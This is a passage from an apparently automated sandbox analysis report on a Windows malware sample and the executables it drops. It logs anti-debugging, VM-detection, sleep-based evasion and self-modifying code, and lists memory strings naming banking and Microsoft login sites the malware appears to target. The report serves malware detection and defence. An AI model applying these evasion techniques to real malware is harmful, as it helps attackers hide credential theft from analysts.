Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 32B1B4 second address: 32B1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8854FAEB91h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338954 second address: 338962 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FD8858h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338962 second address: 338988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FAEB92h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F69 second address: 339F79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8854FD8856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F79 second address: 339F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F7D second address: 339F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F8F second address: 339FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33E22E second address: 33E234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33D7C3 second address: 33D7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CD3C30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E83CA8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F02D14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 19EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 19EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 3C53FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 701BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 8C75BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 8A741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7FEC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7FEB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: A9DD08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A253FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: C48BE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 92A497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: C47740 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: A9B512 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: CF176C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: AA4CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: AA4F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: 893C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: A43CA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: AC2D14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 2A1BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 4675BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 44741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 4CA497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: 88EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: 88EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: AB53FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 1081BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 12475BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 122741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 12AA497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6EDD08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 898BE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 897740 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6EB512 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 94176C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6F4CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6F4F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 67EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 67EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 8A53FC instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 4ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 51F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 71F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4E60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4CB0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Code function: 3_2_05030424 rdtsc 3_2_05030424
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C33BB6 sidt fword ptr [esp-02h] 6_2_00C33BB6
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1227 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1241 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1248 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1265 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Window / User API: threadDelayed 502
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 1908 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe TID: 3924 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2432 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2432 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep count: 1227 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep time: -2455227s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2744 Thread sleep count: 347 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2744 Thread sleep time: -10410000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616 Thread sleep count: 1241 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616 Thread sleep time: -2483241s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1128 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 716 Thread sleep count: 1248 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 716 Thread sleep time: -2497248s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2528 Thread sleep count: 1265 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2528 Thread sleep time: -2531265s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 7120 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 5096 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 1916 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 5636 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 2396 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe TID: 3424 Thread sleep time: -138000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread delayed: delay time: 922337203685477
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ST44OD0PMG8MCMYJRN4.exe, ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2409428853.0000000000881000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505747838.0000000000C27000.00000040.00000001.01000000.0000000B.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000B.00000002.2902072979.0000000000A19000.00000040.00000001.01000000.0000000F.sdmp, ef2532c0b1.exe, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 26e226f915.exe, 0000000D.00000003.3070418121.0000000005EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001179000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001179000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnY
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: 26e226f915.exe, 0000000B.00000002.2904278824.00000000010FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware6N
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2409428853.0000000000881000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505747838.0000000000C27000.00000040.00000001.01000000.0000000B.sdmp, 26e226f915.exe, 0000000B.00000002.2902072979.0000000000A19000.00000040.00000001.01000000.0000000F.sdmp, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread information set: HideFromDebugger
